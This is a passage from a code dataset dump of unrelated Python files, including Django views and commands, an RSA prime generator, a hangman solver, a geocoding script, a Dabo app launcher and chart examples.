\nkw['sort_on'] = ((\"catalog.simulation_state='suspended'\", 'DESC'),\n (\"catalog.simulation_state='validated'\", 'DESC'),\n (\"catalog.simulation_state='confirmed'\", 'DESC'),\n ('modification_date', 'DESC'),)\nkw['simulation_state'] = \"NOT cancelled\"\nkw['limit'] = 30\nresult_list = []\nfor document in portal.portal_catalog(query=query, **kw):\n if document.getPortalType() == \"Upgrade Decision Line\":\n result_list.append(document.getParentValue())\n continue\n result_list.append(document)\nreturn result_list\n","sub_path":"master/bt5/slapos_crm/SkinTemplateItem/portal_skins/slapos_crm_monitoring/Base_getOpenRelatedTicketList.py","file_name":"Base_getOpenRelatedTicketList.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"262738128","text":"from django.core.management.base import BaseCommand\nfrom core.models import User, Team\nfrom guardian.shortcuts import assign_perm\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"who\", type=str)\n parser.add_argument(\"permission\", type=str)\n parser.add_argument(\"team\", type=str)\n\n def handle(self, *args, **options):\n\n who = options[\"who\"]\n if \"@\" in who:\n assign_to = User.objects.get(email=who)\n else:\n assign_to = Team.objects.get(name=who)\n team = Team.objects.get(name=options[\"team\"])\n permission = options[\"permission\"]\n\n assert team.active\n assign_perm(permission, assign_to, team)\n # assert assign_to.has_perm(permission, team)\n","sub_path":"backend/dev_helpers/management/commands/add_team_permission.py","file_name":"add_team_permission.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"23878543","text":"from random import randint\nimport miller_rabin\n\n\ndef produce_p_q(w): # generate the primes p and q\n while 1:\n temp = [1]\n for i in range(w - 2):\n c = randint(0, 1)\n temp.append(c)\n temp.append(1)\n ls2 = [str(j) for j in temp]\n ls3 = ''.join(ls2)\n b = int(ls3[0])\n for i2 in range(len(ls3) - 1):\n b = b << 1\n b = b + int(ls3[i2 + 1])\n if miller_rabin.Miller_Rabin(b):\n return b\n\n\ndef euler(e, n1):\n temp1 = e\n temp2 = n1\n temp = [(e, n1)]\n try:\n while temp1 != 1:\n temp2 = temp2 % temp1\n temp.append((temp1, temp2))\n temp1 = temp1 % temp2\n temp.append((temp1, temp2))\n k = 0\n d = 0\n for j, i in enumerate(temp[::-1], 1):\n if j % 2 == 1:\n d = int((i[1] * k + 1) / i[0])\n else:\n k = int((1 - i[0] * d) / (-i[1]))\n return d\n except:\n return 0\n
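\n# e.g. euler(7, 10) -> 3, since 7*3 = 21 = 2*10 + 1: back-substituting the remainder chain gives d with (d*e) % n1 == 1, and 0 is returned if the chain breaks down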
\n\n\ndef produce_key():\n p = produce_p_q(350)\n q = produce_p_q(350)\n with open('G:/RSA.txt', 'w') as file:\n file.write(str(p))\n file.write('\\n')\n file.write(str(q))\n\n\nif __name__ == '__main__':\n produce_key()\n\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"493507967","text":"from django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .forms import OrderForm\nfrom shopping_bag.context import shopping_bag_contents\nfrom products.models import Product\nfrom .models import Order, OrderLineItem\nfrom profiles.models import UserProfile\n\nimport stripe\n\n\n@login_required\ndef checkout(request):\n stripe_public_key = settings.STRIPE_PUBLIC_KEY\n stripe_secret_key = settings.STRIPE_SECRET_KEY\n\n current_shopping_bag = shopping_bag_contents(request)\n total = current_shopping_bag['total']\n\n if request.method == 'POST':\n shopping_bag = request.session.get('shopping_bag', {})\n print(\"ADDED BY JO: SHOPPING BAG ON LINE 20 = \", shopping_bag)\n\n form_data = {\n 'name': request.POST['name'],\n 'email': request.POST['email'],\n 'phone_number': request.POST['phone_number'],\n 'street_address': request.POST['street_address'],\n 'postcode': request.POST['postcode'],\n 'town_or_city': request.POST['town_or_city'],\n 'country': request.POST['country'],\n }\n\n order_form = OrderForm(form_data)\n if order_form.is_valid():\n order = order_form.save()\n order.total = total\n order.save()\n for item_id, item in shopping_bag.items():\n try:\n product = Product.objects.get(id=item_id)\n order_line_item = OrderLineItem(\n order=order,\n product=product,\n )\n order_line_item.save()\n except Product.DoesNotExist:\n messages.error(request, (\n \"One of the products in your bag wasn't \\\n found in our database.\")\n )\n order.delete()\n\n return redirect(reverse('shopping_bag'))\n\n return redirect(reverse('checkout_success',\n args=[order.order_number]))\n else:\n messages.error(request, 'There was an error with your form. \\\n Please check your information.')\n else:\n shopping_bag = request.session.get('shopping_bag')\n if not shopping_bag:\n return redirect(reverse('products'))\n\n current_shopping_bag = shopping_bag_contents(request)\n total = current_shopping_bag['total']\n stripe_total = round(total * 100)\n stripe.api_key = stripe_secret_key\n intent = stripe.PaymentIntent.create(\n amount=stripe_total,\n currency=settings.STRIPE_CURRENCY,\n )\n\n if request.user.is_authenticated:\n try:\n profile = UserProfile.objects.get(user=request.user)\n order_form = OrderForm(initial={\n 'name': profile.default_name,\n 'email': profile.user.email,\n 'phone_number': profile.default_phone_number,\n 'country': profile.default_country,\n 'postcode': profile.default_postcode,\n 'town_or_city': profile.default_town_or_city,\n 'street_address': profile.default_street_address,\n })\n except UserProfile.DoesNotExist:\n order_form = OrderForm()\n else:\n order_form = OrderForm()\n\n template = 'checkout/checkout.html'\n context = {\n 'order_form': order_form,\n 'stripe_public_key': stripe_public_key,\n 'client_secret': intent.client_secret,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef checkout_success(request, order_number):\n\n order = get_object_or_404(Order, order_number=order_number)\n\n profile = UserProfile.objects.get(user=request.user)\n order.user_profile = profile\n order.save()\n\n if 'shopping_bag' in request.session:\n del request.session['shopping_bag']\n\n template = 'checkout/checkout_success.html'\n context = {\n 'order': order,\n }\n\n return render(request, template, context)\n","sub_path":"checkout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"152056174","text":"# encoding: utf-8\r\n\"\"\"\r\n@author:Sharp_Yi\r\n@file: demo2.py\r\n@time:2018/6/16 20:03\r\n\"\"\"\r\n\r\nimport json\r\nimport os\r\nimport threading\r\nimport datetime as d\r\nimport gevent\r\nimport jsonpath\r\nimport requests\r\ndef work(url):\r\n with open(\"./pic/img{}.jpg\".format(d.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")), 'wb') as 
f:\r\n f.write(requests.get(url).content)\r\ndef writetxt(*args):\r\n tmp = \"\"\r\n for i in args:\r\n tmp += str(i) + \" \"\r\n with open(\"./txt/report{}.txt\".format(d.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")), 'w',encoding='utf-8') as f:\r\n f.writelines(tmp)\r\ndef fun(index, json_list):\r\n json_content = json.load(open(json_list[index],encoding='utf-8'))\r\n title_list = jsonpath.jsonpath(json_content, '$.subjects[*].title')\r\n rate_list = jsonpath.jsonpath(json_content, '$.subjects[*].rate')\r\n img_url = jsonpath.jsonpath(json_content, '$.subjects[*].cover')\r\n ulr_list = jsonpath.jsonpath(json_content, '$.subjects[*].url')\r\n\r\n gevent.joinall(\r\n [gevent.spawn(work, i) for i in img_url]\r\n )\r\n gevent.joinall(\r\n [gevent.spawn(writetxt, i) for i in zip(title_list, rate_list, ulr_list)]\r\n )\r\ndef deletefiles(index):\r\n options= [\"./pic\",\"./txt\"]\r\n if os.listdir(options[index]):\r\n for i in os.listdir(options[index]):\r\n os.remove(os.path.join(options[index],i))\r\ndef run():\r\n t_ = []\r\n for i in range(2):\r\n t =threading.Thread(target=deletefiles, args=(i,))\r\n t.start()\r\n t_.append(t)\r\n return t_\r\ndef until():\r\n os.listdir(\".\")\r\n print(os.listdir(\".\"))\r\n # jsonpath.jsonpath()\r\n\r\n json_list = []\r\n\r\n for i in os.listdir(\".\"):\r\n if i.endswith(\".json\"):\r\n json_list.append(i)\r\n print(json_list)\r\n\r\n t_list = []\r\n\r\n for i in range(json_list.__len__()):\r\n t = threading.Thread(target=fun, args=(i, json_list))\r\n t.start()\r\n t_list.append(t)\r\n\r\n for i in t_list:\r\n i.join()\r\ndef main():\r\n wait_list = run()\r\n for i in wait_list:\r\n i.join()\r\n until()\r\n","sub_path":"demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"81889454","text":"\r\n\r\nprint(\" Welcome to this HTML builder!\")\r\nprint(\"*********************************************************************************************\")\r\nprint(\"Type in the information requested to make formatted HTML code. Hit enter after each question.\")\r\nprint(\"*********************************************************************************************\")\r\nprint()\r\n\r\nhtml_project_title = input(\"What is the name of your HTML project? \")\r\nstage_number_string = input(\"How many Course Stages does your notes cover (e.g. 1, 2, 3...)? \")\r\nstage_number = int(stage_number_string)\r\n\r\nif stage_number != 0:\r\n s = 1\r\n st = []\r\n lt = []\r\n lc = []\r\n html_total = ['', ['', '']]\r\n while stage_number > 0:\r\n try:\r\n s = str(s)\r\n stage_title = input((\"What is the title for Stage\") + ' ' + s + (\"? \"))\r\n \r\n get_lesson_number = input((\"How many lessons does Stage \") + ' ' + s + ' ' + (\"contain? Please use integers only. \"))\r\n \r\n lesson_number = int(get_lesson_number)\r\n if lesson_number == 0:\r\n print(\"You do not have any lessons. What are you trying to pull?\")\r\n elif lesson_number != 0:\r\n n = 1\r\n while lesson_number > 0:\r\n n = str(n)\r\n lesson_title = input((\"What is the title for Lesson\") + ' ' + n + (\"? \"))\r\n lesson_contents = input((\"What is the topic of Lesson\") + ' ' + n + (\"? \"))\r\n \r\n lt.append(lesson_title)\r\n \r\n lc.append(lesson_contents)\r\n html_total.append([stage_title, [lesson_title, lesson_contents]])\r\n lesson_number = lesson_number - 1\r\n n = int(n)\r\n n = n + 1\r\n except ValueError:\r\n print(\"That's not a number. 
This is a number: 7\")\r\n \r\n \r\n st.append(stage_title) \r\n stage_number = stage_number - 1\r\n s = int(s)\r\n s = s + 1\r\nelse:\r\n print(\"You do not have any stages, therefore you have no business here.\")\r\n
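#drop the two placeholder entries that html_total was initialised with\r\n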
html_total = html_total[2:]\r\n\r\n\r\nprint(\"_____________________________________________________\") \r\nprint(\"************** Here is your HTML code! **************\")\r\nprint(\"_____________________________________________________\") \r\nprint(\"\"\"\r\n <html>\r\n <head>\r\n <title>\r\n \"\"\"+html_project_title+\"\"\"\r\n </title>\r\n </head>\r\n <body>\r\n <h1>\r\n \"\"\"+html_project_title+\"\"\"\r\n </h1>
\"\"\")\r\n\r\nfor piece in html_total:\r\n stage_title_alone = piece[0]\r\n \r\n lesson_title_alone = piece[1][0]\r\n lesson_contents_alone = piece[1][1]\r\n lesson_title_alone = str(lesson_title_alone)\r\n lesson_contents_alone = str(lesson_contents_alone)\r\n 
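#each (stage, lesson) pair becomes one section: stage heading, lesson heading, topic paragraph\r\n 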
print(\"\"\"\r\n <h2>\r\n \"\"\" + stage_title_alone + \"\"\"\r\n </h2>\"\"\"\r\n \"\"\"\r\n <h3>\r\n \"\"\" + lesson_title_alone + \"\"\"\r\n </h3>\"\"\"\r\n \"\"\"\r\n <p>\r\n \"\"\" + lesson_contents_alone + \"\"\"\r\n </p>\"\"\"\r\n )
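\r\n#each pass prints roughly: <h2>stage</h2> <h3>lesson</h3> <p>topic</p>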
\r\n\r\n \r\n#closing lines \r\nprint(\"\"\"\r\n </body>\r\n </html> \"\"\")\r\n\r\n","sub_path":"html_generator.py","file_name":"html_generator.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76384996","text":"import node as node\n\n\nchain = node.create(4, next=None)\nchain = node.create(5, chain)\nchain = node.create(1, chain)\nchain = node.create(2, chain)\nchain = node.create(3, chain)\n\n# Write a recursive function for each of the following:\n# Assume that a node chain starts with the reference stored in\n# the variable chain.\n\n\n# 1. Displays the data values stored in a node-chain\n\ndef display(theNode):\n if theNode==None:\n print()\n return None\n else:\n print(node.get_data(theNode), end=' ')\n display(node.get_next(theNode))\n return None\n\ndisplay(chain)\n\n# 2. Counts the number of nodes in a node-chain\n\ndef count(anode):\n \"\"\"\n :param: anode: a node\n :return: the number of nodes in the chain\n \"\"\"\n if anode is None:\n return 0\n else:\n return count(node.get_next(anode)) + 1\n\nprint(count(chain))\n\n# 3. Calculates the sum of the numbers stored in a node-chain\n\ndef sum(anode):\n if anode == None:\n return 0\n else:\n return node.get_data(anode) + sum(node.get_next(anode))\n\n\nprint(sum(chain))\n\n","sub_path":"examples/ch11/exercises_part4_recursion.py","file_name":"exercises_part4_recursion.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45155451","text":"import random\nimport numpy as np\nimport os\nfrom pathlib import Path\nimport pandas as pd\nimport re\nfrom sklearn.preprocessing import LabelEncoder\nimport utils2 as utils\n\n\nclass Dataset():\n def __init__(self, args):\n self.test_path = '/media/ash/New Volume/dataset/UCF_crime'+\\\n '/custom_split_C3D/Custom_test_split_mini.txt'\n self.train_path = '/media/ash/New Volume/dataset/UCF_crime/'+\\\n 'custom_split_C3D/Custom_train_split_mini_abnormal.txt'\n self.dataset_name = args.dataset_name\n self.num_class = args.num_class\n self.feature_size = args.feature_size\n # self.path_to_features = self.dataset_name + '-I3D-JOINTFeatures.npy'\n # self.path_to_annotations = self.dataset_name + '-Annotations/'\n self.features = [] #np.load(self.path_to_features, encoding='bytes')\n # self.segments = np.load(self.path_to_annotations + 'segments.npy')\n self.labels = [] #np.load(self.path_to_annotations + 'labels_all.npy') # Specific to Thumos14\n self.classlist = set() # np.load(self.path_to_annotations + 'classlist.npy')\n self.subset = [] # np.load(self.path_to_annotations + 'subset.npy')\n self.batch_size = args.batch_size\n self.t_max = args.max_seqlen\n self.trainidx = []\n self.testidx = []\n self.classwiseidx = []\n self.currenttestidx = 0\n\n self.get_data_label()\n\n self.labels_multihot = [utils.strlist2multihot(labs, self.classlist)\n for labs in self.labels]\n\n self.train_test_idx()\n self.classwise_feature_mapping()\n\n def get_data_label(self):\n prog = re.compile('[^a-zA-Z]')\n with open(self.train_path, 'r') as fp:\n for line in fp:\n line = line.rstrip()\n self.features.append(line)\n name = 
line.split(os.path.sep)[-1]\n _category = prog.split(name)[0]\n self.classlist.add(_category)\n self.subset.append('test')\n self.labels.append([_category])\n self.classlist = sorted(list(self.classlist))\n\n def train_test_idx(self):\n for i, s in enumerate(self.subset):\n if s == 'train': # Specific to Thumos14\n self.trainidx.append(i)\n else:\n self.testidx.append(i)\n\n def classwise_feature_mapping(self):\n for category in self.classlist:\n idx = []\n for i in self.trainidx:\n for label in self.labels[i]:\n if label == category:\n idx.append(i)\n break\n self.classwiseidx.append(idx)\n\n def _load(self, path, normalize=False):\n x = np.load(path)\n if normalize:\n x = x/np.linalg.norm(x)\n return x\n\n def load_data(self, n_similar=3, is_training=True):\n if is_training:\n features = []\n labels = []\n idx = []\n\n # Load similar pairs\n rand_classid = np.random.choice(len(self.classwiseidx), size=n_similar)\n for rid in rand_classid:\n rand_sampleid = np.random.choice(len(self.classwiseidx[rid]), size=2)\n idx.append(self.classwiseidx[rid][rand_sampleid[0]])\n idx.append(self.classwiseidx[rid][rand_sampleid[1]])\n\n # Load rest pairs\n rand_sampleid = np.random.choice(len(self.trainidx), size=self.batch_size-2*n_similar)\n for r in rand_sampleid:\n idx.append(self.trainidx[r])\n\n data = np.array([utils.process_feat(self._load(self.features[i]), self.t_max)\n for i in idx])\n labels = np.array([self.labels_multihot[i] for i in idx])\n return data, labels\n\n else:\n labs = self.labels_multihot[self.testidx[self.currenttestidx]]\n feat = self._load(self.features[self.testidx[self.currenttestidx]])\n\n if self.currenttestidx == len(self.testidx)-1:\n done = True\n self.currenttestidx = 0\n else:\n done = False\n self.currenttestidx += 1\n\n return np.array(feat), np.array(labs), done\n\n def load_valid(self):\n indices = np.random.choice(self.testidx, size=self.batch_size)\n data = np.array([utils.process_feat(self._load(self.features[i]),\n self.t_max) for i in indices])\n labels = np.array([self.labels_multihot[i] for i in indices])\n return data, labels\n\n def load_one_test(self):\n for idx in self.testidx:\n feat = self._load(self.features[idx])\n labs = self.labels_multihot[idx]\n yield np.array(feat), np.array(labs), self.features[idx]\n","sub_path":"ucf_dataset.py","file_name":"ucf_dataset.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"11172682","text":"import re, os, sys, multiprocessing, glob, operator\nfrom random import randint\n\nre_letters_pattern = r\"[^a-zA-Z]\"\n# Working directory\ncur_dir = os.getcwd()\n# Paths to directories storing files with words\npath_to_final = cur_dir + \"/final/*\"\npath_to_misc = cur_dir + \"/misc/*\"\n\n# Here we'll store all the paths to files with words\npath_to_files = []\nfor fname in glob.glob(path_to_final):\n path_to_files.append(fname)\n\nfor fname in glob.glob(path_to_misc):\n path_to_files.append(fname)\n\nword_bank = []\n\n# Here we go to each file and add the words line by line to word_bank\nfor file_path in path_to_files:\n f = open(file_path, encoding = \"ISO-8859-1\")\n for line in f:\n word_bank.append(re.sub(re_letters_pattern, '', line).lower())\n f.close()\n\n# We'll probably blow up the world if we print the list, so let's print the length\nprint(\"\\nSearching through: {} words\\n\".format(len(word_bank)))\n\n\n\n# Function Definition Area\n\ndef doesNotContain(word, _list):\n for letter in word:\n for bad_letter in 
_list:\n if letter == bad_letter:\n return False\n return True\n\ndef isProperLength(word, length):\n return len(word) == length\n\ndef letters_match(word, letters):\n for i in range(0, len(letters)):\n if letters[i] != '_':\n if word[i] != letters[i]:\n return False\n return True\n# Inspired by the example that if the known is as_, the word can't be ass because the second s would already be there\ndef as_test(word, known):\n known = known.replace('_', '')\n\n word_list = []\n known_list = []\n for letter in word:\n word_list.append(letter)\n for letter in known:\n known_list.append(letter)\n\n #print(word_list)\n #print(known_list)\n\n for letter in known_list:\n index = word_list.index(letter)\n del word_list[index]\n\n #print(word_list)\n #print(known_list)\n\n for letter in known_list:\n if letter in word_list:\n return False\n return True\n\ndef fits_rules(word, exclude_list, known):\n word_length = len(known)\n return isProperLength(word, word_length) and (letters_match(word, known) and (doesNotContain(word, exclude_list) and as_test(word, known)))\n\ndef get_letter_freq(possible_words, known):\n known = known.replace('_', '')\n return_dict = dict()\n \n for pos_word in possible_words:\n pos_word_list = []\n known_list = []\n for letter in pos_word:\n pos_word_list.append(letter)\n for letter in known:\n known_list.append(letter)\n for letter in known_list:\n index = pos_word_list.index(letter)\n del pos_word_list[index]\n for letter in pos_word_list:\n if letter in return_dict:\n return_dict[letter] = return_dict[letter] + 1\n else:\n return_dict[letter] = 1\n sorted_dict = sorted(return_dict.items(), key=operator.itemgetter(1))\n sorted_dict.reverse()\n return sorted_dict\n \ndef get_possible_word(exclude_list, known):\n word_length = len(known)\n possible_words = []\n for word in word_bank:\n if fits_rules(word, exclude_list, known):\n if word in possible_words:\n #print(\"\\nCalculating...\\n\")\n pass\n else: \n possible_words.append(word) \n\n exclude_string = \"\"\n for letter in exclude_list:\n exclude_string += \"{}, \".format(letter)\n exclude_string += \":\"\n if len(exclude_list) == 0:\n exclude_string = \"no letters:\"\n\n print(\"========================\")\n\n print(\"Here are all the possible words for {} excluding {}\\n\".format(known, exclude_string))\n print(possible_words)\n\n print(\"\\nThere are {} out of {} possible words\\n\".format(len(possible_words), len(word_bank)))\n\n print(\"\\nPossible Word Frequencies\\n\")\n letter_freqs = get_letter_freq(possible_words, known)\n for arr in letter_freqs:\n print(\"{}: {}\".format(arr[0], arr[1]))\n print(\"I suggest guessing {}\".format(letter_freqs[0][0]))\n\ndef get_possible_word_comp(exclude_list, known):\n num = 1\n while len(known.replace('_', '')) == 0:\n guess = numToLet(num)\n while guess in exclude_list:\n num += 1\n guess = numToLet(num)\n return {\n 'guess': guess\n }\n print(exclude_list)\n word_length = len(known)\n possible_words = []\n for word in word_bank:\n if fits_rules(word, exclude_list, known):\n if word in possible_words:\n pass\n else: \n possible_words.append(word) \n\n letter_freqs = get_letter_freq(possible_words, known)\n # Prints the letter freqs\n for arr in letter_freqs:\n print(\"{}: {}\".format(arr[0], arr[1]))\n # Filters the ltter freqs for suggestions\n i = 0\n guess = letter_freqs[i][0]\n print(\"I will guess {}\".format(guess))\n print(exclude_list)\n print(guess)\n while in_list(exclude_list, guess):\n print(\"Oh wait it's in the exclusion list\")\n i += 1\n guess = 
letter_freqs[i][0]\n print(\"I will not guess {}\".format(guess))\n return {\n 'guess': guess\n }\n\ndef numToLet(num):\n lets = {\n 1: 'a',\n 2: 'b',\n 3: 'c',\n 4: 'd',\n 5: 'e',\n 6: 'f',\n 7: 'g',\n 8: 'h',\n 9: 'i',\n 10: 'j',\n 11: 'k',\n 12: 'l',\n 13: 'm',\n 14: 'n',\n 15: 'o',\n 16: 'p',\n 17: 'q',\n 18: 'r',\n 19: 's',\n 20: 't',\n 21: 'u',\n 22: 'v',\n 23: 'w',\n 24: 'x',\n 25: 'y',\n 26: 'z'\n }\n return lets[num]\ndef in_list(_list, _thing):\n print(_list)\n for x in _list:\n if _thing == x:\n return True\n return False\n\ndef generate_random_word():\n random_word = word_bank[randint(0, len(word_bank) - 1)]\n word_to_pass = \"\"\n for i in random_word:\n word_to_pass += \"_\"\n return (random_word, word_to_pass)\n\ndef is_solved(word_to_guess, bot_input):\n return word_to_guess == bot_input\n\ndef input_guess(word_to_guess, ignore_list, guess, current_word):\n original_word = word_to_guess\n original_word = original_word.replace(guess, '&')\n re_occur_pattern = r\"[^&]\"\n occurances = len(re.sub(re_occur_pattern, '', original_word))\n if occurances == 0:\n ignore_list.append(guess)\n for loop in range(0, occurances):\n print(\"\\nLoop\\n\")\n print(\"Original Word: {}\".format(original_word))\n print(\"Word To Guess: {}\".format(word_to_guess))\n print(\"Current Word: {}\".format(current_word))\n index = original_word.index('&')\n print(\"Index: {}\".format(index))\n original_word = str_to_list(original_word)\n current_word = str_to_list(current_word)\n print(\"Original Word: {}\".format(original_word))\n print(\"Current Word: {}\".format(current_word))\n \n original_word[index] = guess\n current_word[index] = guess\n \n original_word = list_to_str(original_word)\n current_word = list_to_str(current_word)\n print(\"Original Word: {}\".format(original_word))\n print(\"Current Word: {}\".format(current_word))\n print(\"\")\n print(ignore_list, current_word)\n return (ignore_list, current_word)\n\ndef str_to_list(_str):\n _list = []\n for letter in _str:\n _list.append(letter)\n return _list\n\ndef list_to_str(_list):\n _str = \"\"\n for letter in _list:\n _str += letter\n return _str\n\n#get_possible_word(['k'], '_o__')\ndef play_game():\n gen = generate_random_word()\n word_to_guess = gen[0]\n bot_input = gen[1]\n ignore_list = []\n\n print(\"Chosen word is {}\".format(word_to_guess))\n bot_output = \"a\"\n \n while is_solved(word_to_guess, bot_input) is False:\n print(\"Passing on {} to bot\".format(bot_input))\n bot_output = get_possible_word_comp(ignore_list, bot_input)\n print(\"Robot guessed {}\".format(bot_output[\"guess\"]))\n ig = input_guess(word_to_guess, ignore_list, bot_output[\"guess\"], bot_input)\n ignore_list = ig[0]\n bot_input = ig[1]\n \n#print(get_possible_word_comp(['i', 'o', 'r', 't', 'n'], 'apple'))\nplay_game()\n","sub_path":"src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"630171049","text":"import numpy as np\r\nimport torch\r\nimport torchvision.transforms.functional as F \r\n\r\ndef readAsTensor(path):\r\n with open(path) as f:\r\n content = f.readlines()\r\n\r\n (input_size, output_size,) = [int(a) for a in content[0].split('\\t')]\r\n content = [[float(a) for a in x.strip().split('\\t')] for x in content[1:]]\r\n\r\n return np.array(content, np.float32), input_size, output_size\r\n\r\nclass Normalizer:\r\n def __init__(self, input_size):\r\n self.mean = torch.empty(input_size, dtype = torch.float32)\r\n self.std = 
torch.empty(input_size, dtype = torch.float32)\r\n        pass\r\n\r\n    def load_state_dict(self, state_dict):\r\n        self.mean = state_dict['mean']\r\n        self.std = state_dict['std']\r\n\r\n    def initialize(self, dataset):\r\n        input_size = self.mean.shape[0]\r\n        self.mean = dataset[:, 0:input_size].mean(0)\r\n        self.std = dataset[:, 0:input_size].std(0)\r\n\r\n    def apply(self, dataset):\r\n        input_size = self.mean.shape[0]\r\n        dataset[:, 0:input_size].sub_(self.mean.view(1, -1)).div_(self.std.view(1, -1))\r\n        return dataset\r\n    \r\n    def state_dict(self):\r\n        return {\r\n            'mean': self.mean,\r\n            'std': self.std,\r\n        }\r\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"623825627","text":"import requests\n\napi_url= \"https://maps.googleapis.com/maps/api/geocode/json?address={}&key=\"\n\ndef getLocation(address):\n    url = api_url.format(address)\n    res = requests.get(url)\n    location_dict = res.json()\n    lat = location_dict['results'][0]['geometry']['location']['lat']\n    lng = location_dict['results'][0]['geometry']['location']['lng']\n    cityID = location_dict['results'][0]['address_components'][-1]['short_name']\n    res.close()\n    return lat, lng, cityID\n\nlat, lng, cityID = getLocation(\"台北市大同區民生西路\")\n\nprint(lat)\nprint(lng)\nprint(cityID)\n\npostalCode = {\n    \"中正區\": 100, \"大同區\": 103, \"中山區\": 104, \"松山區\": 105, \"大安區\": 106, \"萬華區\": 108, \"信義區\": 110,\n    \"士林區\": 111, \"北投區\": 112, \"內湖區\": 114, \"南港區\": 115, \"文山區\": 116, \"萬里區\": 207, \"金山區\": 208,\n    \"板橋區\": 220, \"汐止區\": 221, \"深坑區\": 222, \"石碇區\": 223, \"瑞芳區\": 224, \"平溪區\": 226, \"雙溪區\": 227,\n    \"貢寮區\": 228, \"新店區\": 231, \"坪林區\": 232, \"烏來區\": 233, \"永和區\": 234, \"中和區\": 235, \"土城區\": 236,\n    \"三峽區\": 237, \"樹林區\": 238, \"鶯歌區\": 239, \"三重區\": 241, \"新莊區\": 242, \"泰山區\": 243, \"林口區\": 244,\n    \"蘆洲區\": 247, \"五股區\": 248, \"八里區\": 249, \"淡水區\": 251, \"三芝區\": 252, \"石門區\": 253\n}\n","sub_path":"test_code/googleLocation.py","file_name":"googleLocation.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398399985","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# If this is a web application, set the remote host here\nremotehost = \"\"\n\nimport sys\nimport os\nimport dabo.ui\nfrom dabo.dLocalize import _\n# The loading of the UI needs to happen before the importing of the\n# db, biz, and ui packages:\ndabo.ui.loadUI(\"wx\")\n\nif sys.platform == \"win32\":\n\tdabo.MDI = True\n\nif sys.platform == \"darwin\":\n\tdabo.MDI = True\n# hack for locale error on OSX\n# import locale\n# locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')\nimport db\nimport biz\nimport ui\nimport reports\n\n# included for PyInstaller\n#import wx.gizmos, wx.lib.calendar \n\nfrom App import App\napp = App(SourceURL=remotehost)\napp.db = db\napp.biz = biz\napp.ui = ui\napp.reports = reports\n\n# Make it easy to find any images or other files you put in the resources\n# directory.\nsys.path.append(os.path.join(app.HomeDirectory, \"resources\"))\n\napp.setup()\napp.MainFormClass = app.ui.FrmMain\napp.PreferenceManager.setValue(\"fontsize\", 11)\napp.NoneDisplay = \"\"\n# Set up a global connection to the database that all bizobjs will share:\napp.dbConnection = app.getConnectionByName(\"WBSRemoteUser\")\n#app.dbConnection.LogEvents = ['All']\n\n\n# Open one or more of the defined forms. 
A default one was picked by the app\n# generator, but you can change that here. Additionally, if form names were\n# passed on the command line, they will be opened instead of the default one\n# as long as they exist.\napp.ui.AnswersForm = dabo.ui.createClass(\"ui//AnswersForm.cdxml\")\napp.ui.CommentsForm = dabo.ui.createClass(\"ui//CommentsForm.cdxml\")\napp.ui.ContactsForm = dabo.ui.createClass(\"ui//ContactsForm.cdxml\")\napp.ui.GradesForm = dabo.ui.createClass(\"ui//GradesForm.cdxml\")\napp.ui.LessonsForm = dabo.ui.createClass(\"ui//LessonsForm.cdxml\")\napp.ui.StudentsForm = dabo.ui.createClass(\"ui//StudentsForm.cdxml\")\napp.ui.TeachersForm = dabo.ui.createClass(\"ui//TeachersForm.cdxml\")\napp.ui.PrintOrPreviewForm = dabo.ui.createClass(\"ui//PrintOrPreviewForm.cdxml\")\napp.ui.LessonSelector = dabo.ui.createClass(\"ui//LessonSelector.cdxml\")\napp.ui.CommentSelectorForm = dabo.ui.createClass(\"ui//CommentSelectorForm.cdxml\")\napp.DefaultForm = app.ui.StudentsForm\napp.FormsToOpen = [app.DefaultForm]\napp.startupForms()\nif app.MainForm != None:\n\tapp.MainForm.Caption = 'WBSTools version ' + str(app.getAppInfo('appVersion'))\n# Start the application event loop:\napp.start()\n","sub_path":"WBSTools.py","file_name":"WBSTools.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"436237548","text":"from pyecharts import Line\nline = Line(\"折线图--面积实例\",'hello')\n\n#data\nattr = [\"{}\".format(n) for n in range(1,7)]\nv1 = [5, 20, 36, 10, 75, 90]\nv2 = [10, 25, 8, 60, 20, 80]\n\n# 填充 不透明性 填充颜色 